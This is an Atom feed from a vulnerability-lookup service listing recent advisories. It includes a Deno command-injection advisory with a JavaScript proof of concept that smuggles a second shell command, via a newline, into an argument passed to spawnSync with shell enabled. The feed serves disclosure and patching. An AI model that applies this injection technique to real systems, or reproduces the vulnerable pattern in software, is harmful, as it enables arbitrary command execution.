<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-07T07:40:38.133186+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-270441</id>
    <title>EUVD-2026-270441</title>
    <updated>2026-10-07T07:40:38.179808+00:00</updated>
    <content>EUVD-2026-270441</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-270441"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2026-27190</id>
    <title>fkie_cve-2026-27190</title>
    <updated>2026-10-07T07:40:38.179844+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>Deno is a JavaScript, TypeScript, and WebAssembly runtime. Prior to 2.6.8, a command injection vulnerability exists in Deno's node:child_process implementation. This vulnerability is fixed in 2.6.8.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2026-27190"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-hmh4-3xvx-q5hr</id>
    <title>GHSA-hmh4-3xvx-q5hr — Deno has a Command Injection via Incomplete shell metacharacter blocklist in node:child_process</title>
    <updated>2026-10-07T07:40:38.179877+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> crates.io: deno</p>
<p>## Summary
A command injection vulnerability exists in Deno's `node:child_process` implementation.</p>
<p>## Reproduction
```javascript
import { spawnSync } from "node:child_process";
import * as fs from "node:fs";</p>
<p>// Cleanup
try { fs.unlinkSync('/tmp/rce_proof'); } catch {}</p>
<p>// Create legitimate script
fs.writeFileSync('/tmp/legitimate.ts', 'console.log("normal");');</p>
<p>// Malicious input with newline injection
const maliciousInput = `/tmp/legitimate.ts\ntouch /tmp/rce_proof`;</p>
<p>// Vulnerable pattern
spawnSync(Deno.execPath(), ['run', '--allow-all', maliciousInput], {
  shell: true,
  encoding: 'utf-8'
});</p>
<p>// Verify
console.log('Exploit worked:', fs.existsSync('/tmp/rce_proof'));
```</p>
<p>Run: `deno run --allow-all poc.mjs`</p>
<p>The file `/tmp/rce_proof` is created, confirming arbitrary command execution.</p>
<p>## Mitigation</p>
<p>All users need to update to the patched version (Deno v2.6.8).</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-hmh4-3xvx-q5hr"/>
  </entry>
</feed>
